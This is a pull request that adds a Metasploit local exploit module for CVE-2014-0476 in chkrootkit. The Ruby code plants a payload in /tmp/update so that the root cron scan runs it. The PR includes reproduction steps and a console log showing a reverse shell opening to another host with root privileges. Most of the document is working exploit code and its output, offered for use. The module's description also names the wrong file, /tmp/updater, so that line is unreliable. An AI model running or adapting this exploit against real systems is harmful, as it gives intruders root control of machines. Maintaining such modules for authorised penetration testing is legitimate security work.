### PR TITLE
Add a module for a chkrootkit-powered privsec

### DIFF
--- a/modules/exploits/linux/local/chkrootkit.rb
+++ b/modules/exploits/linux/local/chkrootkit.rb
@@ -13,22 +13,22 @@ class Metasploit4 < Msf::Exploit::Local
 
   include Msf::Exploit::Local::Linux
 
-  def initialize(info={})
-    super( update_info( info, {
+  def initialize(info = {})
+    super(update_info(info, {
       'Name'    => 'Chkrootkit 0.49 Local Privilege Escalation',
-      'Description'   => %q{
+      'Description'   => %q(
         Chkrootkit before 0.50 will run as root any executable file named
         /tmp/updater, allowing a trivial privsec.
 
         WfsDelay is set to 24h by default, since this is how often a chkrootkit
         scan is scheduled by default.
-      },
+      ),
       'License'     => MSF_LICENSE,
       'Author'  => [
         'Thomas Stangner', # original exploit
         'Julien (jvoisin) Voisin' # metasploit module
       ],
-      'Platform'    => %w{ bsd linux unix solaris osx},
+      'Platform'    => %w( bsd linux unix solaris osx),
       'SessionTypes'  => [ 'shell', 'meterpreter' ],
       'References'  =>
       [
@@ -37,26 +37,23 @@ class Metasploit4 < Msf::Exploit::Local
         [ 'CWE', '20' ],
         [ 'EDB', '33899' ],
         [ 'OSVDB', '107710' ],
-        [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ],
+        [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ]
       ],
       'DisclosureDate' => "Jun 28 2014",
       'Arch'       => ARCH_CMD,
-      'DefaultOptions' => { 'WfsDelay' => 60*60*24 },
+      'DefaultOptions' => { 'WfsDelay' => 60 * 60 * 24 },
       'Privileged'   => true,
-      'Targets'     =>
-      [
-        [ 'Generic', {} ],
-      ],
+      'Targets'     => [[ 'Generic', {} ]],
       'Stance' => Msf::Exploit::Stance::Passive,
-      'DefaultTarget' => 0,}))
+      'DefaultTarget' => 0 }))
   end
 
   def check
     res = cmd_exec('/usr/sbin/chkrootkit -V')
     if res && res =~ /chkrootkit version 0\.[^5]/
-        Exploit::CheckCode::Appears
+      Exploit::CheckCode::Appears
     else
-        Exploit::CheckCode::Safe
+      Exploit::CheckCode::Safe
     end
   end
 
@@ -78,4 +75,3 @@ class Metasploit4 < Msf::Exploit::Local
     register_file_for_cleanup('/tmp/update')
   end
 end
-

--- a/modules/exploits/linux/local/chkrootkit.rb
+++ b/modules/exploits/linux/local/chkrootkit.rb
@@ -41,7 +41,7 @@ class Metasploit4 < Msf::Exploit::Local
       ],
       'DisclosureDate' => "Jun 28 2014",
       'Arch'       => ARCH_CMD,
-      'DefaultOptions' => { 'WfsDelay' => 60*3600*24 },
+      'DefaultOptions' => { 'WfsDelay' => 60*60*24 },
       'Privileged'   => true,
       'Targets'     =>
       [

--- a/modules/exploits/linux/local/chkrootkit.rb
+++ b/modules/exploits/linux/local/chkrootkit.rb
@@ -53,8 +53,11 @@ class Metasploit4 < Msf::Exploit::Local
 
   def check
     res = cmd_exec('/usr/sbin/chkrootkit -V')
-    return Exploit::CheckCode::Appears if res && res =~ /chkrootkit version 0\.[^5]/
-    return Exploit::CheckCode::Safe
+    if res && res =~ /chkrootkit version 0\.[^5]/
+        Exploit::CheckCode::Appears
+    else
+        Exploit::CheckCode::Safe
+    end
   end
 
   def exploit

--- a/modules/exploits/linux/local/chkrootkit.rb
+++ b/modules/exploits/linux/local/chkrootkit.rb
@@ -1,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit4 < Msf::Exploit::Local
+  # This could also be excellent, but since it requires
+  # up to one day to pop a shell, lets set it to Manual instead.
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  include Msf::Exploit::Local::Linux
+
+  def initialize(info={})
+    super( update_info( info, {
+      'Name'    => 'Chkrootkit 0.49 Local Privilege Escalation',
+      'Description'   => %q{
+        Chkrootkit before 0.50 will run as root any executable file named
+        /tmp/updater, allowing a trivial privsec.
+
+        WfsDelay is set to 24h by default, since this is how often a chkrootkit
+        scan is scheduled by default.
+      },
+      'License'     => MSF_LICENSE,
+      'Author'  => [
+        'Thomas Stangner', # original exploit
+        'Julien (jvoisin) Voisin' # metasploit module
+      ],
+      'Platform'    => %w{ bsd linux unix solaris osx},
+      'SessionTypes'  => [ 'shell', 'meterpreter' ],
+      'References'  =>
+      [
+        [ 'BID', '67813' ],
+        [ 'CVE', '2014-0476' ],
+        [ 'CWE', '20' ],
+        [ 'EDB', '33899' ],
+        [ 'OSVDB', '107710' ],
+        [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ],
+      ],
+      'DisclosureDate' => "Jun 28 2014",
+      'Arch'       => ARCH_CMD,
+      'DefaultOptions' => { 'WfsDelay' => 60*3600*24 },
+      'Privileged'   => true,
+      'Targets'     =>
+      [
+        [ 'Generic', {} ],
+      ],
+      'Stance' => Msf::Exploit::Stance::Passive,
+      'DefaultTarget' => 0,}))
+  end
+
+  def check
+    res = cmd_exec('/usr/sbin/chkrootkit -V')
+    return Exploit::CheckCode::Appears if res && res =~ /chkrootkit version 0\.[^5]/
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    else
+      print_good("Target is vulnerable.")
+    end
+
+    print_warning('Rooting depends of the crontab, this could take a while.')
+
+    write_file("/tmp/update", "#!/bin/sh\n#{payload.encoded}\n")
+    cmd_exec("chmod +x /tmp/update")
+
+    print_status 'Payload written to /tmp/update'
+    print_status 'Waiting to chkrookit to be run be a cron tab...'
+
+    register_file_for_cleanup('/tmp/update')
+  end
+end
+


### PR DESCRIPTION
This modules implements an exploit for CVE-2014-0476, to gain root thanks to [chkrootkit](http://www.chkrootkit.org).

Its main issues is that you need to wait until chkrootkit is executed in a crontab (or manually), which can take 24h top with its default setup.

How to reproduce:
1. Install a [version < 0.50 of chkrootkit](ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit-0.49.tar.gz)
2. Launch the local module
3. Wait until chkrootkit's crontab kicks in
4. You've got a root shell

```
msf > use exploit/linux/local/chkrootkit
msf exploit(chkrootkit) > check
[*] 192.168.1.25 - The target appears to be vulnerable.
msf exploit(chkrootkit) > run
[*] Exploit completed, but no session was created.

[*] Started reverse handler on 192.168.1.11:9999
msf exploit(chkrootkit) > [+] Target is vulnerable.
[!] Rooting depends of the crontab, this could take a while.
[*] Payload written to /tmp/update
[*] Waiting to chkrookit to be run be a cron tab...
[*] Command shell session 6 opened (192.168.1.11:9999 -> 192.168.1.25:40006) at 2015-11-06 20:53:00 +0100
[+] Deleted /tmp/update

msf exploit(chkrootkit) > sessions -i 6
[*] Starting interaction with 6...
id
uid=0(root) gid=0(root) groups=0(root)
```
